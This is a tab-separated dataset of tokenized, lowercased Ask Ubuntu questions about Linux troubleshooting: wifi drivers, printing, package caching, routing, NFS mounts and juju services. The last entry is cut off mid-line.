250304	caching centos packages on ubuntu using apt-cacher-ng	i am using virtualbox with ubuntu 12.04 as the host and centos 6.3 as the guest os . apt-cacher-ng is configured on the host os for caching the packages . i did a bit of googling , but could not figure out how to cache the centos guest packages on the ubuntu host using apt-cacher-ng . how to configure this ? also , what is the preferred approach to cache the packages in centos ?
250308	printing from firefox to network printer does not work	i just noticed that since using ubuntu 12.04 ( .01 ) or since some update ( ca n't tell it for sure ) i can not print from firefox to my network printer ( samsung clx-3175fn ) any more . for a very short moment i can see the printer icon in the panel on top and then it 's gone and nothing happens . printing from other applications like evince or adobe acrobat works ( so this is not a duplicate of : ca n't print from adobe reader or from firefox ) i have found a forum entry from somebody having the same issue : http : //ubuntuforums.org/showthread.php ? p=12486689 # post12486689 however , other than the poster there , i have a clean install and not an update of my ubuntu ( i am using 12.04.01 with latest updates ) . even from chromium printing is working so it is not a browser-issue in general . what i noticed is that status message of the printer ( but only when printing from firefox and chromium ) in the print dialog says `` printer 'samsung-clx-3175fn ' has no toner left '' . printer dialog called from text editor or evince says `` ready to print. '' . and although print dialog calling from chromium gives the same wrong message ( there is 13 % toner left says the web interface of the printer ) chromium prints it out fine . what can be the reason ?
250310	my dell latitude d400 with lubuntu 12.04 can find my wifi network ... but ca n't authenticate the access . what could i check ?	i 'm an absolute beginner as an [ l ] ubuntu user . the fact is my laptop can find any wifi network , but when i insert the password ( which is absolutely right , i assure ) it asks again for the password few seconds later and it keeps asking and asking and asking ... btw i 'm using this same laptop now , but with an wired network . i have another computer , a desktop , with ubuntu using the same wifi network . i 've already tried to restart my router and any device . what else could i check ? this is what i have here : 01:03.0 network controller : intel corporation pro/wireless lan 2100 3b mini pci adapter ( rev 04 ) subsystem : intel corporation device 2565 flags : bus master , medium devsel , latency 32 , irq 5 memory at fcfee000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ dc ] power management version 2 kernel driver in use : ipw2100 kernel modules : ipw2100 $ dmesg | grep ipw210 [ 20.552763 ] ipw2100 : intel ( r ) pro/wireless 2100 network driver , git-1.2.2 [ 20.552768 ] ipw2100 : copyright ( c ) 2003-2006 intel corporation [ 20.552930 ] ipw2100 0000:01:03.0 : pci int a - > link [ lnkb ] - > gsi 5 ( level , low ) - > irq 5 [ 20.553507 ] ipw2100 : detected intel pro/wireless 2100 network connection sudo iwlist scan cell 03 - address : bla bla essid : '' finosuave '' protocol : ieee 802.11bg mode : master frequency:2.437 ghz ( channel 6 ) encryption key : on bit rates bla bla bla bla bla bla quality:89 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk extra : last beacon : 24ms ago
250313	problem with symbolic toolbox of matlab 2010b , 32bit , installed in ubuntu 12.04 lts , 64-bit	i have installed 32-bit matlab 2010b on 64-bit ubuntu 12.04 lts according to the instructions given in here . it is doing fine except the symbolic toolbox package . whenever i try to run a command like 'sym a ' or any other command that needs use of symbolic toolbox , it becomes busy . the program can not be terminated by pressing ctrl + c. the terminal , from where matlab was launched , reads : /usr/local/matlab/r2010b/toolbox/symbolic/mupad/share//bin/mupkern : 115 : exec : /usr/local/matlab/r2010b/toolbox/symbolic/mupad/glnxa64/bin/mupkern : not found need your advice on how to fix this problem . thanks in advance .
250314	dual-use guest for lxc and kvm ?	would it be possible to install ( and maintain by simple means , such as apt-get dist-upgrade ) a `` dual-use '' setup ? i.e . install an guest instance in a way which allows me to run it either as lxc or as kvm guest and switch between the method at will ? concerning the apt-get dist-upgrade mentioning above , i mean that i want to install it in a way so that the kernel and grub are updated in the guest for when it runs fully virtualized in kvm - given this is at all possible .
250315	display difficulties with ubuntu 12.10 , dual monitors , and ati hd 5800	i have the ubiquitous and difficult display problems . i have a very limited understanding of everything regarding graphic display mechanics , and gnome specific terms , so please let me know if you suspect communication errors on my end . all of my applications are having their own fairly similar sets of problems . desktop response is laggy , generally a one second delay when i hit the pseudo-windows key , and then stuttering ( frame drop ? ) while resuming . document viewer lags while scrolling in a diagonal stepped pattern , and firefox does the same with a little 'tearing ' on the steps . terminal is n't noticeably troublesome . my hardware is more than capable using better supported operating systems ( no emotions implied ) . here is some basic information : gnome3 , gdm , and here is my lspci -vvnn|grep -m 1 -a 70 5800 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati cypress le [ radeon hd 5800 series ] [ 1002:689e ] ( prog-if 00 [ vga controller ] ) subsystem : pc partner limited device [ 174b : e177 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 4 bytes interrupt : pin a routed to irq 50 region 0 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 2 : memory at fd4c0000 ( 64-bit , non-prefetchable ) [ size=128k ] region 4 : i/o ports at be00 [ size=256 ] [ virtual ] expansion rom at fd400000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ 58 ] express ( v2 ) legacy endpoint , msi 00 devcap : maxpayload 256 bytes , phantfunc 0 , latency l0s < 4us , l1 unlimited exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag+ phantfunc- auxpwr- nosnoop+ maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 5gt/s , width x16 , aspm l0s l1 , latency l0 < 64ns , l1 < 1us clockpm- surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : not supported , timeoutdis- devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : 5gt/s , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -3.5db , equalizationcomplete- , equalizationphase1- equalizationphase2- , equalizationphase3- , linkequalizationrequest- capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit+ address : 00000000fee0f00c data : 41b1 capabilities : [ 100 v1 ] vendor specific information : id=0001 rev=1 len=010 < ? > capabilities : [ 150 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes+ tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap+ cgenen- chkcap+ chken- kernel driver in use : fglrx_pci kernel modules : fglrx_updates , radeon i am ready to output more information . is there a way to code block text without using the indent method described here ? my terminal output for /var/log/gdm/\:0.log contains some invisible ( non-whitespace/newline ) characters which break the indent code block on every line . my protocol is : cat / ... /log > new.info gedit new.info select all , and paste . in the preview pane , it is clear that the return key does nothing now .
250316	unable to mount sd card	i have a pre - installed windows 8 pc which i have partitioned with ubuntu 12.10 . i am able to mount the sd card in windows 8 , but when i put it in when running ubuntu , nothing happens . it does n't appear in the media folder either . here is lsusb : enter codebus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 1d57:32da xenta 2.4ghz receiver ( keyboard and mouse ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 13d3:5165 imc networks lscpi 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 7 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : ralink corp. rt5390 wireless 802.11n 1t/1r pcie 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 03:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0a ) dmesg | tail : [ 22.986262 ] cfg80211 : found new beacon on frequency : 2472 mhz ( ch 13 ) on phy0 [ 23.236412 ] init : anacron main process ( 1078 ) killed by term signal [ 23.486446 ] init : plymouth-stop pre-start process ( 1258 ) terminated with status 1 [ 27.222396 ] wlan0 : authenticate with e0:69:95 : b6:01:42 [ 27.237975 ] wlan0 : send auth to e0:69:95 : b6:01:42 ( try 1/3 ) [ 27.239515 ] wlan0 : authenticated [ 27.250064 ] wlan0 : associate with e0:69:95 : b6:01:42 ( try 1/3 ) [ 27.253585 ] wlan0 : rx assocresp from e0:69:95 : b6:01:42 ( capab=0x411 status=0 aid=2 ) [ 27.253923 ] wlan0 : associated [ 27.254274 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready someone please help , as i really need to be able to use my sd card . thanks ! !
250318	installing vmwareplayer on ubuntu 12.04	i get a error `` one or more of your processors does not have the necessary 64 bit extensions to run vware virtual machines '' what does this mean ? my sys 32-bit , ubuntu 12.04 32-bit , vmware 5.0.1 32-bit . after typing in the consol `` gksudo bash ./vmware-player-5.0.1-894247.i386.bundle press enter . extracting vmware installer ... done . then i get the error message .
250324	setting up ovpn connect for iphone with no ovpn file	i have a working openvpn connection on a ubuntu laptop . when i export it ( using network-manager ) i get a conf file . i need an ovpn file so i can configure my openvpn app on my iphone . i also have a crt file which i used to configure my laptop with - if it 's any help . trying to send the conf file to via mail and import it yielded an error message about a missing crt file . sending the crt file create a profile that i 'm not aware how to use . we 're using user/pass authentication so i wo n't be able to get a key and cert file .
250329	using avconv and keeping audiostreams and subtitles	i am trying to encode a mkv-file while keeping the audiostreams and the subtitles . this is the command i am using : avconv -i inputfile.mkv -c : v mpeg2video -acodec copy - scodec copy -b : v 5000k -maxrate : v 6000k -bufsize 1835k outputfile.mkv the problem is that my mkv contains more than one audiostream and subtitle . and using the upper command the output file only contains the default marked audiostream and subtitle . is there any additional command to copy all containing audiostreams and subtitles ?
250330	trouble logging into newly installed ubuntu 12.04	i 've installed ubuntu 12.04 , but when i login it says bryan @ ubuntu : ~ $ and waits for me to type something . is it supposed to be the password or is there a command i 'm supposed to enter ? thank you !
250331	12.04 lts updated today and now throws me back to login screen after logging in	i allowed the update to run and once it finished , i restarted . now it will not accept my password . i can log in as a guest , but can not access most of my programs or files . additionally , when i enter my password , it seems to begin the login process but after the screen flashing black ( there are some lines displayed but it flashes too rapidly to see ) the system returns me to the log in screen . i tried logging in in terminal and this is the error i get : last login : fri feb 1 09:15:55 est 2013 on tty1 welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-37-generic x86_64 ) * documentation : https : //help.ubuntu.com/ [ 1 ] keyct1_search : required key not available perhaps try the interactive 'encryptfs-mount-private ' i am a purely cut/paste user . this is really getting to be an issue . for each of the past three updates that required a restart , my system has failed to restart for a variety of reasons ... how can i fix this ?
250333	running executable txt.file in terminal by default	basically , i have the code i need to run the thread to start my minecraft server in an executable text file . when i click it , it asks me what i want to do with it : run in terminal , display or just run . because i want to create a link to it and then put that link in docky , i need a way of setting it to run in terminal by default . i found a way to make it run by default , but i need to run it in terminal .
250336	disable mouse movement in tap zones on synaptics trackpad	i have an hp dv6-3160 with a `` soft '' trackpad e.g . the buttons are part of it . ubuntu 12.10 works well with it apart from when i want to drag+drop . because the mouse movement area includes the buttons if i 'm holding down the left button i can mess everything up just by a twitch of my left finger ( i can of course use tap-to-click and then move things but only up ! ) . what i 'd like to do is be able to set a `` dead zone '' - just stop all mouse movement in the button area ( i have enough space above ) . installed the synaptics package and tried using synclient and setting bottomedge but no matter what ( valid - if i set it too low it errors ) value i set it to the mouse behaviour does n't change . many thanks in advance .
250338	how to install packages per-user ?	i 'd like to install programs without affecting other users on a box . i can imagine a parallel install tree ( lib , bin , man , etc . ) in my user directory . can apt-get do that , or is there another technique that would work ?
250340	ubuntu one installed on windows 7 ( 32 bit ) wo n't launch - does nothing	after running the installer i click on the desktop icon and i see the hour glass for a moment but nothing happens . i see the ubuntuone-control-panel-qt.exe appear in the task manager only momentarily - then disappears .
250347	counting files per owner recursively	from an entire directory structure i would like to output all the owners and how many files belong to each owner . i would like an output like this : + -- -- -- -+ -- -- -+ | alex | 3 | | liza | 345 | | harry | 564 | | sally | 23 | + -- -- -- -+ -- -- -+ how can i do this in bash ?
250348	failed rebooting ubuntu 12.10 after installation in virtualbox	i tried to install ubuntu 12.10 i386 with the latest virtualbox on windows 8 x64 pro sony vaio vpcf11e1r . at the end of installation i waited for about 10 minutes observing the system is going down for reboot now ! and reset vm manually . new boot resulted in the same installation procedure asking to try or install it again . why the reboot failed ?
250355	how to copy into with cp if destination folder already exists ?	example ... this is what i want . /tmp $ cp -f -r -- verbose /tmp/a /tmp/b `/tmp/a ' - > `/tmp/b' `/tmp/a/file2 ' - > `/tmp/b/file2' `/tmp/a/file1 ' - > `/tmp/b/file1' this is what i do not want . /tmp $ cp -f -r -- verbose /tmp/a /tmp/b `/tmp/a ' - > `/tmp/b/a' `/tmp/a/file2 ' - > `/tmp/b/a/file2' `/tmp/a/file1 ' - > `/tmp/b/a/file1' how can i let cp behave as if the folder did n't already exist ? ( i do n't want to delete it beforehand . just some files from /tmp/a to get copied into /tmp/b without creating a sub folder a inside /tmp/b . so it looks like /tmp/b/file1 /tmp/b/file2 and so on . )
250364	attempting to re-install postgres fails due to rabbitmq	on 12.04 , when i do apt-get install on postgresql ( which is already installed ) , it returns an error that mentions rabbitmq-server . what are the circumstances that could cause this type of failure ? # apt-get install -y postgresql reading package lists ... done building dependency tree reading state information ... done postgresql is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 80 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up rabbitmq-server ( 2.7.1-0ubuntu4 ) ... starting rabbitmq-server : failed - check /var/log/rabbitmq/startup_ { log , _err } rabbitmq-server . invoke-rc.d : initscript rabbitmq-server , action `` start '' failed . dpkg : error processing rabbitmq-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : rabbitmq-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
250369	why does upstart fail to start my juju service with unknown job : juju-ubuntu-0 ?	i 'm having issues launching juju on an lxc container through regular juju deploy commands : juju bootstrap juju deploy ubuntu the ubuntu juju status continually says pending . the lxc starts , and i can even ssh into it if i get a hold of the ip address . but , the juju service fails to start in it . after some debugging , i have found that the upstart job fails to start . what is going on ? output from upstart service : root @ dpb-local-ubuntu-0 : /home/ubuntu # ll /etc/init/juju* -rw-r -- r -- 1 root root 495 feb 1 18:41 /etc/init/juju-ubuntu-0.conf root @ dpb-local-ubuntu-0 : /home/ubuntu # service juju-ubuntu-0 start start : unknown job : juju-ubuntu-0 root @ dpb-local-ubuntu-0 : /home/ubuntu # manual starting of the script works ( it even updates juju status correctly ) : root @ dpb-local-ubuntu-0 : /home/ubuntu # export juju_zookeeper= '' 10.0.3.1:39983 '' root @ dpb-local-ubuntu-0 : /home/ubuntu # export juju_unit_name= '' ubuntu/0 '' root @ dpb-local-ubuntu-0 : /home/ubuntu # export juju_machine_id= '' none '' root @ dpb-local-ubuntu-0 : /home/ubuntu # export juju_home= '' /var/lib/juju '' root @ dpb-local-ubuntu-0 : /home/ubuntu # export juju_env_uuid= '' none '' root @ dpb-local-ubuntu-0 : /home/ubuntu # /usr/bin/python -m juju.agents.unit -- nodaemon -- logfile /var/log/juju/unit-ubuntu-0.log -- session-file /var/run/juju/unit-ubuntu-0-agent.zksession ^c here is the upstart config file : description `` juju unit agent for ubuntu/0 '' author `` juju team < juju @ lists.ubuntu.com > '' start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] respawn env juju_env_uuid= '' none '' env juju_home= '' /var/lib/juju '' env juju_machine_id= '' none '' env juju_unit_name= '' ubuntu/0 '' env juju_zookeeper= '' 10.0.3.1:39983 '' exec /usr/bin/python -m juju.agents.unit -- nodaemon -- logfile /var/log/juju/unit-ubuntu-0.log -- session-file /var/run/juju/unit-ubuntu-0-agent.zksession > > /var/log/juju/unit-ubuntu-0-output.log 2 > & 1 the following is from /var/log/cloud-init-output.log setting up juju ( 0.6.0.1+bzr608-0juju2~precise1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for python-support ... start : unknown job : juju-ubuntu-0 failed : /var/lib/cloud/instance/scripts/runcmd [ 1 ] 2013-02-01 18:41:37,603 - cc_scripts_user.py [ warning ] : failed to run-parts in /var/lib/cloud/instance/scripts 2013-02-01 18:41:37,604 - __init__.py [ warning ] : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/cloudinit/cloudconfig/__init__.py '' , line 117 , in run_cc_modules cc.handle ( name , run_args , freq=freq ) file `` /usr/lib/python2.7/dist-packages/cloudinit/cloudconfig/__init__.py '' , line 78 , in handle [ name , self.cfg , self.cloud , cloudinit.log , args ] ) file `` /usr/lib/python2.7/dist-packages/cloudinit/__init__.py '' , line 326 , in sem_and_run func ( *args ) file `` /usr/lib/python2.7/dist-packages/cloudinit/cloudconfig/cc_scripts_user.py '' , line 31 , in handle util.runparts ( runparts_path ) file `` /usr/lib/python2.7/dist-packages/cloudinit/util.py '' , line 227 , in runparts raise runtimeerror ( 'runparts : % i failures ' % failed ) runtimeerror : runparts : 1 failures 2013-02-01 18:41:37,605 - __init__.py [ error ] : config handling of scripts-user , none , [ ] failed full console log for reference : http : //pastebin.ubuntu.com/1598256/ requested output : root @ dpb-local-ubuntu-0 : /var/log # date mon feb 4 15:41:38 utc 2013 root @ dpb-local-ubuntu-0 : /var/log # sudo start juju-ubuntu-0 start : unknown job : juju-ubuntu-0 root @ dpb-local-ubuntu-0 : /var/log # ll /var/log/init ls : can not access /var/log/init : no such file or directory root @ dpb-local-ubuntu-0 : /var/log # dmesg |grep init [ 0.000000 ] initial memory mapped : [ mem 0x00000000-0x1fffffff ] [ 0.000000 ] init_memory_mapping : [ mem 0x00000000-0xbf7fffff ] [ 0.000000 ] init_memory_mapping : [ mem 0x100000000-0x33f7fffff ] [ 0.000000 ] memory : 12261276k/13623296k available ( 6718k kernel code , 1060604k absent , 301416k reserved , 6452k data , 932k init ) [ 0.000124 ] security framework initialized [ 0.000167 ] apparmor : apparmor initialized [ 0.263902 ] devtmpfs : initialized [ 0.265782 ] trying to unpack rootfs image as initramfs ... [ 0.322530 ] scsi subsystem initialized [ 0.335211 ] pnp : pnp acpi init [ 0.599361 ] audit : initializing netlink socket ( disabled ) [ 0.599408 ] type=2000 audit ( 1359415390.492:1 ) : initialized [ 0.616085 ] fuse init ( api version 7.19 ) [ 0.723931 ] freeing initrd memory : 21968k freed [ 0.816927 ] device-mapper : ioctl : 4.22.0-ioctl ( 2011-10-19 ) initialised : dm-devel @ redhat.com [ 0.817336 ] ashmem : initialized [ 4.468141 ] device-mapper : dm-raid45 : initialized v0.2594b [ 4.472486 ] async_tx : api initialized ( async ) [ 26.988510 ] init : eucalyptus-network ( lo ) main process ( 1170 ) killed by term signal [ 27.437140 ] init : failsafe main process ( 1166 ) killed by term signal [ 27.668253 ] bluetooth : hci device and connection manager initialized [ 27.668254 ] bluetooth : hci socket layer initialized [ 27.668254 ] bluetooth : l2cap socket layer initialized [ 27.668264 ] bluetooth : sco socket layer initialized [ 28.105061 ] bluetooth : rfcomm tty layer initialized [ 28.105065 ] bluetooth : rfcomm socket layer initialized [ 56.880220 ] init : udev-fallback-graphics main process ( 2295 ) terminated with status 1 [ 56.953337 ] init : gdm main process ( 2333 ) killed by term signal [ 128.387028 ] init : plymouth-stop pre-start process ( 4158 ) terminated with status 1 further debugging : root @ dpb-local-ubuntu-2 : ~ # ps -ef |grep juju root 11444 11381 0 16:42 pts/0 00:00:00 grep -- color=auto juju root @ dpb-local-ubuntu-2 : ~ # initctl start juju-ubuntu-2 initctl : unknown job : juju-ubuntu-2 root @ dpb-local-ubuntu-2 : ~ # initctl reload-configuration root @ dpb-local-ubuntu-2 : ~ # initctl start juju-ubuntu-2 juju-ubuntu-2 start/running , process 11448 root @ dpb-local-ubuntu-2 : ~ #
250370	how to route 3 nics and 3 subnets	i am trying to setup routing between 3 subnets using an ubuntu 12.10 server with 3 nics . i would like to be able to have all these subnets route between one another as well as be able to access the internet . the 10.0.2.0 network is connected to the internet . the netgear router box connected to the internet has an address of 10.0.2.1 . the three subnets are 10.0.2.0/16 , 10.100.0.0/16 , and 10.101.0.0/16 . i have tried to setup my /etc/network/interfaces to define both the nics and the routing but it does n't seem to be working . i can ping all the nics on the ubuntu server from any machine on any of the respective subnets but i am not able to ping any systems on different subnets from any of those subnets . neither can i get out to the internet from the subnets . # /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface # eth0 auto eth0 allow-hotplug eth0 iface eth0 inet static address 10.0.2.154 netmask 255.255.0.0 gateway 10.0.2.1 dns-nameservers 10.0.2.100 8.8.8.8 # eth1 auto eth1 allow-hotplug eth1 iface eth1 inet static address 10.100.0.4 netmask 255.255.0.0 dns-nameservers 10.0.2.100 8.8.8.8 # eth2 auto eth2 allow-hotplug eth2 iface eth2 inet static address 10.101.0.1 netmask 255.255.0.0 dns-nameservers 10.0.2.100 8.8.8.8 up route add -net 10.0.0.0 netmask 255.255.0.0 gw 10.0.2.1 dev eth0 up route add -net 10.100.0.0 netmask 255.255.0.0 gw 10.0.2.154 dev eth0 up route add -net 10.101.0.0 netmask 255.255.0.0 gw 10.0.2.154 dev eth0 up route add -net 10.101.0.0 netmask 255.255.0.0 gw 10.100.0.4 dev eth1 up route add -net 10.0.0.0 netmask 255.255.0.0 gw 10.100.0.4 dev eth1 up route add -net 10.100.0.0 netmask 255.255.0.0 gw 10.101.0.1 dev eth2 up route add -net 10.0.0.0 netmask 255.255.0.0 gw 10.101.0.1 dev eth2 i would love to hear any suggestions as to how i could fix my /etc/network/interfaces file to properly route between these subnets .
250371	realtek rtl8188cus 802.11n wlan adapter not connecting , keeps asking for password	info : http : //pastebin.com/raw.php ? i=7qj7byby ive got output from lsusb , lsmod , ifconfig and syslog there what happens is that it can detect wireless networks but ca n't connect to them . it just keeps asking for the wifi password . i 've tried both wep and wpa2 personal , both no luck . this wifi device is a wifi dongle that seems to be using a realtek chip as you can see from lsusb output . i really have no idea what 's wrong with it because it is working fine in other os . but i 'd really like to use linux so i 'm trying to get this to work . hope someone can help , thanks a lot .
250373	when is opencobol 1.1 going to be released on ubuntu ?	can anyone give me any idea if and when opencobol 1.1 is likely to be released on ubuntu . the version that comes with ubuntu does not have many of the commands available such as trim , when-compiled and numerous other features in 1.1 .
250374	how can i play acoustic guiter in ubuntu ? like placing cords making leads and playing it	is there any package available for ubuntu which allows me to create guiter music such as cords place and making lead melody , edit/delete/etc ?
250380	is there any ubuntu api ?	in windows , a programmer can use windows api to write a windows application . windows api can be used with c ( not necessarily c++ ) . in windows api you have a message loop and you have to program responses to different messages ( eg a right click on client area ) . is there any ubuntu api ? i do n't mean qt or gtk . i 'm looking for a raw ( c/c++ ) api so that everything must be ( re ) designed .
250382	juju charm , deb package or puppet	i have a django project which when deployed provides mysql-nss services . this dule use database setup requires automatic deployment by any basic server user . the first part is the creation of an sql database on localhost , followed by the configuration of mysql-nss for the server . each client machine that wants to authentication then requires not just pointing at the new server 's mysql database , but a very specific list of sql commands which access the data . this specify leads me to believe that the server and client setups should be packaged for deployment . should i use juju charms for server/client , should i use debian packages to set everything just so , including over-riding the mysql-nss-bg package 's config files . or should i force users to learn pupper or similar technology to manage their clients and simply just provide a template config with the required sql commands ? the least complex , most secure solution is preferable .
250388	ubuntu needs to support android / mtp devices	ubuntu ( community ) has not done enough to solve mtp issue , for android devices . even ( microsoft ) windows xp fully supports this .
250396	ubuntu arm ldd ca n't find libs	i have a program that compiled fine on ubuntu arm ( 12.04 ) but it can not run due to linking errrs . e.g . libx11.so.6 can not be found , however it is clearly in /usr/lib/arm-linux-gnueabihf ldconfig -v shows it as well what 's weird is when i pass ld_library_path=/usr/lib/arm-gnueabihf/ to ldd ( after the shared library ) , i get the message ldd : ld_library_path=/usr/lib/arm-linux-gnueabihf/ : no such file or directory while the directory clearly exists . what could be going wrong ? i ran sudo ldconfig .
250397	after upgrade to 12.04 , can only access wired and unsecured wireless networks	i recently upgraded to 12.04 and during the upgrade installation notices my wireless signal indicator go to `` no wireless '' . since the upgrade , i can only access the internet via a wired connection or an unsecured wireless connection . i do not like leaving my home wireless unsecured , however that is now my only option unless i want to go buy a 25 ' long ethernet cable to give me the ability to sit somewhere beside the floor near where my router is located . any ideas as to what may have happened and/or how i can fix this bug so i can secure my home network once again ?
250398	ubuntu 12.04 mysql wo n't install	error when i trying to install mysql-server on ubuntu 12.04 apparmor parser error for /etc/apparmor.d/usr.sbin.mysqld in /etc/apparmor.d/usr.sbin.mysqld at line 9 : abstractions/mysql start : job failed to start
250401	wireless for minipc	i bought a giada i35v with no software and tried to install ubuntu 12lts which runs through install but i can not make wifi work , the driver does n't have .inf file so the windows driver program does n't work . i tried install of ubuntu 12.10 , the wireless adapter works in initial screen but it wo n't boot from usb and the install will finish but when i try to boot up again the process stalls at 'checking battery status ' and freezes so i ca n't get in . does anyone know how i could install lts and find the linux driver for the wifi or fix 12.10 install ?
250403	backup , sync , and mirror app	on windows i used zback for backing up some directories to a networked drive ( i.e , copying all new files from source to target ) keeping a mirror of some directories on a networked drive ( i.e , copying all new files from source to target , and deleting files from target which no longer exist on source ) syncing my working folder to my flash drive ( i.e. , overwriting older files on target with newer files from source , and vice versa ) is there any single app for ubuntu that can do all this ? preferably something with scripting and gui support . i really do n't want to have to resort to wine for something so simple . i tried grsync , but this seems lacking in functionality . do i have to go learn rsync , or is there another alternative ? sixhobbits
250405	how to differentiate barcode scanner data from regular keyboard input ?	i am looking forward to buy a barcode scanner for a project . this project is a web application running as a web server on the local computer , and a browser on that same machine for the client-side . the barcode scanner would be attached to that machine . it seems a lot usb barcode scanners emulate a keyboard , however i would like to differentiate regular keyboard input from the barcode scanner data . how could i achieve that ? getting the barcode data on the server-side an interesting configuration for me would be to simply fetch the data from the barcode scanner from my application ( i think this can be done by reading from /dev/input/by-path/pci-xxx-usb-xxx-kbd ) , and disable that device in xorg ( since the /etc/x11/xorg.conf file is mostly bypassed in recent ubuntu versions , i do n't know how to do that ) . note that i would like if possible to trap input from the barcode scanner while my application does n't have focus ( it 's the server part of a web application , so it 's not even an xorg application ) , so i do need to prevent xorg from sending the events to the focused application . getting the barcode data on the client-side otherwise , i could map a fake keyboard layout on the barcode scanner ( eg . mapping the digits to obscure utf-8 characters ) but keep the regular layout for the keyboard , using this technique detailed on super user . then i would know when the barcode scanner is used because i would recieve weird digits on the client side ( a web page ) .
250406	mounting nfs issues - lvm - ext4	i set my ubuntu desktop up with lvm2 . i do n't know if that is contributing to the issue or whether i have forgotten something . when i try to mount the external filesystem with this command : sudo mount -t ext4 192.168.1.2 : /media/backup/sorted /home/stuart/home-nfs over the network i get the following ouput : mount : special device 192.168.1.2 : /media/backup/sorted does not exist stuart @ stu-hp : ~ $ edit test.txt however , running the following code works , so i know that it is 'there ' . stuart @ stu-hp : ~ $ scp test.txt 192.168.1.2 : /media/backup/sorted stuart @ 192.168.1.2 's password : test.txt 100 % 11 0.0kb/s 00:00 my /etc/exports file on the nfs ( centos 6 ) server looks like so : /media/backup/sorted 192.168.1.0/24 ( rw , sync , no_root_squash ) i get the following output when i manually stop and start the nfs service : [ root @ tower backup ] # service nfs stop shutting down nfs daemon : [ ok ] shutting down nfs mountd : [ ok ] shutting down nfs quotas : [ ok ] shutting down nfs services : [ ok ] [ root @ tower backup ] # service nfs start starting nfs services : [ ok ] starting nfs quotas : [ ok ] starting nfs mountd : [ ok ] stopping rpc idmapd : [ ok ] starting rpc idmapd : [ ok ] starting nfs daemon : [ ok 